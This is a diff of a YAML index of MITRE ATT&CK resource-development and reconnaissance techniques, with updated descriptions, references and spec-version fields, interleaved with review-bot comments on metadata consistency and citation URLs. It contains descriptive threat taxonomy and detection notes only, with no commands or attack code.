x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
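Review bot: for T1588.003 both `spec_version` and `x_mitre_attack_spec_version` are removed with no replacement (`- spec_version: '2.1'` / `- x_mitre_attack_spec_version: 2.1.0`), whereas T1588 and T1587 in the surrounding hunks get `x_mitre_attack_spec_version: 3.2.0`. The same removal recurs for T1588.005, T1596.003, T1597.002 and T1590.005, which are exactly the objects whose `modified` went backward, so these five entries appear to come from a pre-3.x STIX object. Any consumer that validates every technique carries `x_mitre_attack_spec_version` will now fail on them. The remainder of this hunk (the T1587 reference list removal) is pure reordering; every removed reference reappears in the next hunk.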
@@ -55656,21 +56290,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
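Review bot: the re-added `Mandiant APT1` reference keeps the `https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf` URL, while the `FireEyeSupplyChain` reference in T1588 earlier in this patch was moved to `mandiant.com`. Worth checking that the fireeye.com PDF still resolves, since the other FireEye-hosted reference evidently needed the move. Otherwise this hunk adds `revoked: false` and `x_mitre_deprecated: false`, reorders references, and bumps the spec to 3.2.0 while leaving `x_mitre_version` at 1.1, which is consistent with the description being unchanged.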
@@ -55710,7 +56380,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -55729,15 +56399,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
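Review bot: the new clause `or compromising a cloud service that enables managing domains (e.g., AWS Route53)` is inserted ahead of the existing `(Citation: Krebs DNS Hijack 2019)`, so the Krebs article now reads as supporting the cloud-service case too; if it does not, that claim wants its own citation. Minor: AWS writes the product as `Route 53`. The `spec_version` / `x_mitre_attack_spec_version` removal at the top of this hunk (T1588.005) leaves that object with no spec version field at all, per the earlier comment.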
@@ -55745,19 +56413,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -55791,55 +56459,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Internet Scan: Response Content'
type: attack-pattern
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
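Review bot: the added paragraph on User-Agent gating describes behaviour the victim only sees as its own outbound HTTP request and the differing response, yet `x_mitre_data_sources` stays at `'Internet Scan: Response Content'` and `x_mitre_detection` is unchanged. If this index feeds detection mapping, a follow-up upstream asking for a victim-side data source (network traffic content, or response content keyed by User-Agent) would make the new paragraph actionable. Consistency checks pass: the new `(Citation: TrellixQakbot)` has its reference entry in this hunk, the contributor is added, and `x_mitre_version` moves from 1.1 to 1.2 with the description change.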
@@ -55864,7 +56541,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -55880,8 +56557,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
@@ -55903,7 +56578,7 @@ reconnaissance:
url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -55919,8 +56594,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -55948,7 +56621,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -55964,33 +56637,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
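Review bot: the new AXFR paragraph introduces three citation keys, `(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)`, that are plain text inside the description and only resolve if matching `source_name` entries exist under `external_references`; the following hunk adds all three, so they do resolve here, but YAML loading would not catch a dangling key, so a generator check that every `(Citation: X)` has a `source_name: X` is worth keeping. The wording change from `DNS, MX, TXT, and SPF records` to `DNS MX, TXT, and SPF records` and the `x_mitre_version` bump from `'1.1'` to `'1.2'` are consistent with each other; the `x_mitre_contributors` and `x_mitre_deprecated` lines are moved, not changed.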
@@ -56004,18 +56677,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
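Review bot: the Sean Metcalf reference changes both host and path, from `https://twitter.com/PyroTek3/status/1126487227712921600/photo/1` to `https://x.com/PyroTek3/status/1126487227712921600`, dropping the `/photo/1` suffix; the `source_name` is unchanged, so the `(Citation: Sean Metcalf Twitter DNS Records)` key in the description still resolves. The three added references carry stable archive or government URLs, and the `Trails-DNS` entry already points at `web.archive.org`, which is the right choice for a blog post that the description says has since moved.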
@@ -56036,7 +56720,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -56052,39 +56736,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
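Review bot: the T1594 description switches from a `|-` block scalar to a double-quoted scalar with `\n\n` escapes, and the cause is visible at the end of the value: `(Citation: Register Robots TXT 2015) "` carries a trailing space before the closing quote. A YAML dumper will not emit block style for a string with trailing whitespace, so that one character forces the quoted form and makes the whole paragraph unreadable in diffs. Suggest stripping trailing whitespace from description values in the generator (the text is otherwise identical to the removed block), which would also keep future upstream edits to this field reviewable line by line.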
@@ -56092,13 +56774,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
